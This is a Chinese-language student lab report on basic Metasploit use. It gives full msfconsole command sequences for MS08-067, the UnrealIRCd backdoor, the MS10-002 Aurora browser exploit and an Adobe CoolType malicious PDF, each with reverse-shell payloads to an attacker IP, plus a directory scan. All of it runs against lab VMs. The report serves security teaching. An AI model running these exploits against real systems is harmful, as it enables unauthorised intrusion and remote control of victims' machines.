作者:Lucky_Leeing | 来源:互联网 | 2024-11-17 17:21
本实验旨在掌握Metasploit框架的基本应用方法,重点学习三种常见的攻击方式及其实施思路。实验内容包括一次主动攻击(如MS08-067)、一次针对浏览器的攻击(如MS11-050)以及一次针对客户端的攻击(如Adobe漏洞利用)。此外,还包括成功应用一个辅助模块。
实验目标
掌握Metasploit框架的基本应用方法,重点学习三种常见的攻击方式及其实施思路。
实验内容
- 一次主动攻击实践,如MS08-067;
- 一次针对浏览器的攻击,如MS11-050;
- 一次针对客户端的攻击,如Adobe漏洞利用;
- 成功应用一个辅助模块。
基础问答
- 解释什么是exploit、payload和encode。
- exploit:工具,用于连接漏洞并执行渗透攻击模块,将payload传送到目标机器。
- payload:载荷,是在目标系统被exploit传送后,在目标机器上运行的攻击代码。
- encode:编码,用于包装payload,改变其特征码,以避免被安全软件轻易检测到。
实验步骤
任务一:主动攻击
1. MS08-067_netapi:自动化漏洞溢出攻击
- 靶机IP:192.168.31.101
- 攻击机IP:192.168.31.185
- 在Kali终端输入
msfconsole
,进入MSF控制台。
- 输入
search ms08-067
查找可利用模块。
- 输入
use exploit/windows/smb/ms08_067_netapi
启用该模块。
- 输入
info
查看模块信息。
- 输入
set payload windows/meterpreter/reverse_tcp
选择攻击模块。
- 输入
set RHOSTS 192.168.31.101
设置靶机IP地址。
- 输入
set LHOST 192.168.31.185
设置攻击机IP地址。
- 输入
set LPORT 4325
设置监听端口。
- 输入
run
运行攻击。
连接成功。
2. Unreal IRCD后门漏洞
- 在Kali终端输入
msfconsole
,进入MSF控制台。
- 输入
search Unreal IRCD
搜索相关利用模块。
- 输入
use exploit/unix/irc/unreal_ircd_3281_backdoor
启用该模块。
- 输入
show payloads
查看可用的payload。
- 输入
set payload cmd/unix/reverse_perl
选择并使用此payload。
- 输入
set RHOSTS 192.168.31.38
设置靶机IP地址。
- 输入
set LHOST 192.168.31.185
设置攻击机IP地址。
- 输入
set LPORT 4325
设置监听端口。
- 输入
run
运行攻击。
连接成功。
任务二:针对浏览器的攻击
MS10-002 Aurora漏洞利用
- 在MSF控制台中输入
search ms10-002
查找并使用相关模块。
- 输入
use exploit/windows/browser/ms10_002_aurora
选择使用该模块。
- 输入
set payload windows/meterpreter/reverse_tcp
设置payload。
- 输入
set SRVPORT 77
设置服务端口。
- 输入
set URIPATH /
设置URI路径。
- 在XP中打开IE浏览器,输入
http://192.168.31.185:77/
。
连接成功。
尝试对主机进行提权。
提权成功。
任务三:针对客户端的攻击
Adobe CoolType漏洞利用
- 进入MSF控制台,输入
use exploit/windows/fileformat/adobe_cooltype_sing
选择攻击模块。
- 输入
set payload windows/meterpreter/reverse_tcp
设置payload。
- 输入
set LHOST 192.168.31.158
设置攻击机IP地址。
- 输入
set LPORT 4325
设置监听端口。
- 输入
set FILENAME yjw4325.pdf
指定生成的PDF文件名。
- 输入
exploit
发起攻击。
- 将生成的PDF文件拖入XP系统。
- 回到Kali,输入
back
退出当前模块。
- 输入
use exploit/multi/handler
启用监听模块。
- 输入
set payload windows/meterpreter/reverse_tcp
设置payload。
- 输入
set LHOST 192.168.31.185
设置攻击机IP地址。
- 输入
set LPORT 4325
设置监听端口。
- 输入
exploit
开始监听。
在XP中打开PDF文件,连接成功。
任务四:辅助模块攻击
目录扫描
- 在MSF控制台输入
use auxiliary/scanner/http/dir_scanner
使用目录扫描辅助模块。
- 输入
set RHOSTS 192.168.31.101
设置要扫描的IP地址。
- 输入
set THREADS 30
设置线程数。
- 输入
exploit
开始扫描。
实验体会
本次实验较为简单,主要问题在于使用XP虚拟机时,安装Adobe Reader多次失败。实验主要涉及Metasploit的基本应用,通过不同类型的攻击要求,帮助我们全面掌握其使用方法。总的来说,这次实验让我对黑客技术有了初步的认识,收获颇丰。